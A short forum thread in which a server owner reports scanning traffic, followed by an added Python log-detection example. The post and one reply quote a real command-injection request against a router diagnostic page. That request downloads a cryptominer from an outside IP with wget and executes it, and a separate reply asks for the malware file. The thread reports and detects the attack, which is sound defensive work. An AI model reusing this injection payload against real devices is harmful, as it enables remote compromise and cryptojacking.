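I've been attacked
Scanned again
Anonymous user 2018-07-27 15:07:20 2052 views

I had apache2 running for half a day, and most of the log entries are this IP requesting the following URL on the server: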

/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

It's a cryptominer; the script is downloaded from: http://178.128.11.199/


岁月别催 2018-07-30 17:03:48 Reply
Can anyone share the rvs file? It's 404 now.
AP_CERT 2018-07-30 11:57:02 Reply
"requestParameters": {
    "ping_ip": "google.ca ; cd /tmp;wget http://178.128.11.199/rvs -O /tmp/rz;chmod 777 /tmp/rz;sh /tmp/rz ",
    "bucketName": "**-***-***-sorry-server",
    "nslookup_button": "nslookup_button",
    "key": "cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup"
}
微步情报局 2018-07-27 19:37:55 Reply
This has been pretty common lately.
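
Added example, not part of the original thread: a Python check that finds requests like the one in the opening post in an Apache access log by percent-decoding each query parameter and flagging values that chain shell commands after the expected argument. The log lines, the client address 203.0.113.7 and the function name `inspect_line` are constructed for illustration; only the request URL is taken from the post.

```python
import re
from urllib.parse import parse_qsl

# Apache common/combined log format: client, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)[^"]*" (\d{3})')
# Shell separators that let extra commands follow the expected argument.
SEPARATORS = re.compile(r'[;|&`\n]|\$\(')
# Commands that make up a download-and-run chain like the one in the post.
FETCH_RUN = re.compile(r'\b(?:wget|curl|tftp|chmod|sh|bash)\b')
URL_RE = re.compile(r'https?://[^\s;|&]+')

def inspect_line(line):
    """Return a finding for a log line with shell commands in a query value, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    path, _, query = target.partition("?")
    # parse_qsl percent-decodes each value (%20 -> space, %3B -> ';').
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SEPARATORS.search(value) and FETCH_RUN.search(value):
            return {"client": client, "status": int(status), "path": path,
                    "param": name, "decoded": value,
                    "urls": URL_RE.findall(value)}  # download locations to block or hunt for
    return None

# Constructed sample log lines (client IP, timestamps and status are made up);
# the first request target is the URL quoted in the post.
SAMPLE_LINES = [
    '203.0.113.7 - - [27/Jul/2018:14:58:01 +0800] "GET /cgi-bin/luci/;stok=redacted'
    '/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button'
    '&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20http://178.128.11.199/rvs'
    '%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20 HTTP/1.1" 404 503',
    '203.0.113.7 - - [27/Jul/2018:14:59:10 +0800] "GET /cgi-bin/luci/expert/'
    'maintenance/diagnostic/nslookup?ping_ip=google.ca HTTP/1.1" 404 503',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        finding = inspect_line(line)
        if finding:
            print(finding["client"], finding["param"], repr(finding["decoded"]))
            print("  fetched from:", finding["urls"])
```

The decoded `ping_ip` value it reports for the first sample line is the same string shown in AP_CERT's `requestParameters` fragment.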